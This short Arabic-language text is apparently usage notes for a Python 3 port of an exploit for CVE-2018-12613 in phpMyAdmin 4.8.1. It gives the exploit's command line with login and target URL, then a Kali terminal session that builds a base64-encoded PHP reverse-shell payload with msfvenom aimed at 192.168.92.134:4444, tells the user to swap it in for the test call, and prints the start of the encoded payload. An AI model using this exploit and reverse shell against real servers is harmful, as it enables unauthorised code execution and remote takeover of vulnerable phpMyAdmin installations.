
استغلال معدّل مستقل تم نقله إلى Python 3
استغلال معدّل مستقل تم نقله إلى Python 3. تم اختباره على Python 3.7.3، phpMyAdmin 4.8.1 يعمل على Ubuntu 16.04 يعمل على Linux فقط. الاستغلال الأصلي بواسطة SSD. كل الفضل لهم.
python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”
نتائج كود php تُخزَّن في results.html
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php
استخدم حمولة msfvenom php بدلاً من phpcredits(); أعلاه
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php
eval(base64_decode(ICAg...gfQo));